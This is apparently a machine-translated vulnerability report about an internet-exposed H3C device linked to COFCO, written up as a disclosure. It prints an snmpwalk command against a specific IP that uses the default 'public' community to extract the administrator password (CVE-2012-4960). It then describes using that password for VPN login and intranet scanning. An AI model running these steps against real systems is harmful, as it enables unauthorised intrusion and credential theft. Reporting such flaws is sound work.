Cofco I purchased a device defect on the internet, causing password cracking to enter the Intranet (the Intranet is not roaming)
Cofco I bought a weak password from a certain system on the Internet. It is too easy to describe it like this. It is too clear that everyone knows where the problem is. It can be accessed through the Intranet without roaming.
CVE-2012-4960
H3c snmp obtains the Administrator Logon Password
Http://drops.wooyun.org/tips/409
The address of the H3C device:
Http: // 118.144.75.80: 8081/web/index? Language = cn
Test results:
Snmpwalk-c public-v 1 118.144.75.80 1.3.6.1.4.1.25506.2.12.1.1.1
Crack the password:
Web login failed, but the device supports VPN. The attempt to log on to the VPN account is successful.
Configure the local VPN logon using the obtained account and password
Login successful, view the corresponding IP Address
I scanned it and verified the risks.
Solution:
Contact the manufacturer.
VPN access users cannot determine the network range they can access.